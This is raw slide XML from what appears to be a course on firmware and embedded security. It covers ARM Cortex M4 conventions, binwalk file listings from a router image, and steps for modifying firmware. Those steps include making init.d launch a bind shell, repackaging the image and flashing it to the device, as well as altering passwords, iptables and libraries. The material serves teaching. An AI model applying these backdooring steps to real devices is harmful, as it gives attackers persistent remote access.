            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/local/samba/lib/smb.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/etc/ld.so.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/etc/resolv.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/etc/lld2d.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/etc/udev/udev.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.cfg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.ini</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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417401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1" y="113983"/>
            <a:ext cx="11213736" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>ARM Cortex M4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574380" y="1208810"/>
            <a:ext cx="11066077" cy="492107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Calling conventions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Args are in r0, r1, r2, r3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>r4-r11 contain local variables and must be restored by callee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Link register (LR) is r14 contains control address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>BL moves PC to r14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>BLR moves r14 to pc (r15)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SP is r13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Memory*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Code at 0x00000000 to 0x1fffffff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Flash at 0x80000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SRAM at 0x20000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Peripherals at 0x40000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>System control registers at 0xe0000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>* The memory map is highly vendor specific. As ARM is technically only a IPCore, the actual implementations depends on the Chip vendor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65F8FBC-9B82-DE47-9491-97A097845F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1448478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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1551709"/>
            <a:ext cx="11582400" cy="4951423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>***Search for database related files***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.db</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.sqlite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### *.sqlite3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>***Search for shell scripts***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>##################################### shell scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/check_http.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/rotatelog.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-------------------- admin --------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/httpd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/lib/iptables/libipt_REJECT.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/lib/libshared.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/local/samba/sbin/smbd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/local/samba/bin/smbpasswd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/sbin/rc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/lib/libbigballofmud.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295664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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Binwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357445" y="1717964"/>
            <a:ext cx="11582400" cy="4785168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-------------------- root --------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/cron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/iptables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/iptables-restore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/ip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/ip6tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/radvd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/brctl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/pppd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/nas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>d/squashfs-root/usr/sbin/tc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>… lots more</a:t>
            </a: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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712891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Reverse engineer firmware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2019803"/>
            <a:ext cx="11582400" cy="4187035"/>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Get firmware mod kit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng"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https://github.com/brianpow/firmware-mod-kit.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Use it to add and start binaries, files and change configuration and even change the OS.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Edit /etc/scripts to have init.d run bindshell.exe </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Repackage firmware.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sudo cp bindshell.exe .</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./build-firmware.sh fw-dir –nopad –min</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Flash new FW into device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC2101D-8205-8A4F-94E3-0EA49520ACB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3537191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Modifying Firmware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2076643"/>
            <a:ext cx="11582400" cy="407477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Once we have the file system and kernel we can introduce changes in several ways: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We can change the kernel itself</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We can modify configuration files (passwords, iptables,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We can cause new demons to run (and open new ports, etc)</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We can modify a commonly used application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We can modify libraries (this is common in the mobile ecosystem)</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Then we can repackage the firmware and load it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3245550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Modifying Firmware (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="2050472"/>
